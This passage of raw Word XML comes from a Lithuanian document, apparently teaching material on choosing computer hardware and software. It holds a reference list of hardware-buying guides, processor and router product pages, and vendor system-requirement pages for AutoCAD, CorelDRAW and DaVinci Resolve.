          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuterių sistemas</w:t>
      </w:r>
      <w:r w:rsidR="28E77E46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> bei programinę įrangą</w:t>
      </w:r>
      <w:r w:rsidR="0451CBA6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (licencijavimą)</w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF3D02" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atsižvelgdami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į visus</w:t>
      </w:r>
      <w:r w:rsidR="00BB51E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> programinės</w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB51E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">įrangos </w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gamintojo sisteminius reikalavimus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0D397" w14:textId="0B4FE09C" w:rsidR="171451CB" w:rsidRPr="005A5C28" w:rsidRDefault="171451CB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715C5784" w14:textId="00E4BA85" w:rsidR="3D768C64" w:rsidRPr="005A5C28" w:rsidRDefault="47936638" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32396854" w14:textId="03C4C0D9" w:rsidR="6D3008F8" w:rsidRPr="005A5C28" w:rsidRDefault="2EAC492E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>How to Build the Best PC for 3D Rendering and Animation</w:t>
      </w:r>
      <w:r w:rsidR="20AED409" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2020, spalio 2). </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidR="20AED409" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>Logical Increments</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="20AED409" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidR="0120E9A1" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.logicalincrements.com/articles/building-pc-3d-rendering-animation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18CA497F" w14:textId="59399A2E" w:rsidR="6D3008F8" w:rsidRPr="005A5C28" w:rsidRDefault="6608E39F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Glawion</w:t>
      </w:r>
      <w:r w:rsidR="007A2483" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> A. (2021</w:t>
      </w:r>
      <w:r w:rsidR="464EEB42" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, sausio </w:t>
      </w:r>
      <w:r w:rsidR="63F51E44" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="4E5481BA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="577DAC3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="577DAC3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Building the best PC for 3D Animation [2021 Guide]</w:t>
      </w:r>
      <w:r w:rsidR="7225E5D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CGdirector</w:t>
      </w:r>
      <w:r w:rsidR="577DAC3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="577DAC3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="46502EA4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidR="0120E9A1" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.cgdirector.com/best-computer-for-animation/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2253C551" w14:textId="529A9618" w:rsidR="09B033D5" w:rsidRPr="005A5C28" w:rsidRDefault="63FA68AE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Glawion</w:t>
      </w:r>
      <w:r w:rsidR="007A2483" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0D23AA24" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> A. (</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidR="74F4DA5F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, sausio 9</w:t>
      </w:r>
      <w:r w:rsidR="6CA9FEE2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="4A9A8BD1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7ED6AA98" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Best Workstation Computer for 3D Modeling and Rendering</w:t>
      </w:r>
      <w:r w:rsidR="7ED6AA98" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0EAE4975" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CGdirector.</w:t>
      </w:r>
      <w:r w:rsidR="0EAE4975" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7ED6AA98" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="674D432C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidR="3DF820E0" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.cgdirector.com/best-computer-3d-modeling-rendering/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="740F8B37" w14:textId="1F7345D6" w:rsidR="4329EC79" w:rsidRPr="005A5C28" w:rsidRDefault="4D7969B3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Lee</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> T. (</w:t>
      </w:r>
      <w:r w:rsidR="126CE18E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r w:rsidR="098FA031" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="126CE18E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="67013011" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sausio 9</w:t>
      </w:r>
      <w:r w:rsidR="126CE18E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">). A Guide to the Best Computer for 3D Modeling and Rendering. </w:t>
      </w:r>
      <w:r w:rsidR="1C21DA84" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Academy </w:t>
      </w:r>
      <w:r w:rsidR="1C21DA84" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">of animated art. </w:t>
      </w:r>
      <w:r w:rsidR="1C21DA84" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidR="2990632D" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://academyofanimatedart.com/a-guide-to-the-best-computer-for-3d-modeling-and-rendering/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45CD0E08" w14:textId="7A60CC7D" w:rsidR="660AB46A" w:rsidRPr="005A5C28" w:rsidRDefault="78827CF7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">AMD Processors for Desktops. </w:t>
      </w:r>
      <w:r w:rsidR="57FE4F0D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD. </w:t>
      </w:r>
      <w:r w:rsidR="016A62C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 9).</w:t>
      </w:r>
      <w:r w:rsidR="57FE4F0D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="57FE4F0D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidR="664ACA1C" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.amd.com/en/products/processors-desktop</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="762A3A8D" w14:textId="78714F7E" w:rsidR="660AB46A" w:rsidRPr="005A5C28" w:rsidRDefault="09E46862" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Intel® Core™ Processor Family. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intel. </w:t>
      </w:r>
      <w:r w:rsidR="0E30B283" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2021, sausio 9). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.intel.com/content/www/us/en/products/processors/core.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D63E17E" w14:textId="000386A2" w:rsidR="3D768C64" w:rsidRPr="005A5C28" w:rsidRDefault="0F880B85" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cisco</w:t>
      </w:r>
      <w:r w:rsidR="4C4D42C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Products, Solutions, and Services. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidR="6D758A98" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.cisco.com/c/en/us/products/routers/product-listing.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="331B7122" w14:textId="27376EDF" w:rsidR="3D768C64" w:rsidRPr="005A5C28" w:rsidRDefault="6D758A98" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">System requirements for AutoCAD 2021 including Specialized Toolsets. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Autodesk. </w:t>
      </w:r>
      <w:r w:rsidR="5E02B69E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 9).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Hlk61949240"/>
      <w:r w:rsidR="28C6AA02" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="0064348F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0064348F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://knowledge.autodesk.com/support/autocad/troubleshooting/caas/sfdcarticles/sfdcarticles/System-requirements-for-AutoCAD-2021-including-Specialized-Toolsets.html" </w:instrText>
      </w:r>
      <w:r w:rsidR="0064348F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="28C6AA02" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://knowledge.autodesk.com/support/autocad/troubleshooting/caas/sfdcarticles/sfdcarticles/System-requirements-for-AutoCAD-2021-including-Specialized-Toolsets.html</w:t>
      </w:r>
      <w:r w:rsidR="0064348F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4506D339" w14:textId="40EC7036" w:rsidR="3D768C64" w:rsidRPr="005A5C28" w:rsidRDefault="0C261DE5" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">CorelDRAW Graphics Suite X8: System Requirements. </w:t>
      </w:r>
      <w:r w:rsidR="196CFE71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Corel. </w:t>
      </w:r>
      <w:r w:rsidR="132B4DEC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 9).</w:t>
      </w:r>
      <w:r w:rsidR="196CFE71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="196CFE71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://support.corel.com/hc/en-us/articles/219326157-CorelDRAW-Graphics-Suite-X8-System-Requirements</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="206C5761" w14:textId="5DEFEBE0" w:rsidR="5D0351E1" w:rsidRPr="005A5C28" w:rsidRDefault="6E8AC621" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DaVinci Resolve System Requirements &amp; Recommended Hardware. </w:t>
      </w:r>
      <w:r w:rsidR="3BEFC870" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 9)</w:t>
      </w:r>
